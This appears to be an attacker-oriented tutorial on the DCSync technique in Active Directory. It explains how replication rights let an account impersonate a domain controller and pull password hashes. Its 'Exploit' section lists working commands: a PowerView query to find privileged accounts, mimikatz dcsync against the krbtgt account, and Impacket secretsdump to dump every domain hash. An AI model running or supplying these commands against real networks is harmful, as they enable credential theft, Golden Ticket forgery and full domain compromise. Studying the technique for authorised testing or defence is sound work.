Overview
In production environments, domains typically rely on more than one domain controller to provide redundancy. The Directory Replication Service (DRS) Remote Protocol uses replication to synchronize these redundant domain controllers. A domain controller may request an update for a specific object, like an account, using the IDL_DRSGetNCChanges API. Luckily for us, the domain controller receiving a request for an update does not check whether the request came from a known domain controller. Instead, it only verifies that the associated SID has appropriate privileges. If we attempt to issue a rogue update request to a domain controller from a user with certain rights it will succeed. To launch such a replication, a user needs to have the Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set rights. By default, members of the Domain Admins, Enterprise Admins, and Administrators groups have these rights assigned. If we obtain access to a user account in one of these groups or with these rights assigned, we can perform a dcsync attack in which we impersonate a domain controller. This allows us to request any user credentials from the domain. This can be used by attackers to get any account’s NTLM hash including the KRBTGT account, which enables attackers to create Golden Tickets.
Exploit
- Find a user that has the rights (above)
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
# if the user has the necessary rights :
lsadump::dcsync /domain:<domain> /user:<user>
# FOR EXAMPLE:
lsadump::dcsync /domain:fcorp.local /user:krbtgt
# with powerview
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
# LINUX
# Find the user that has the rights
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes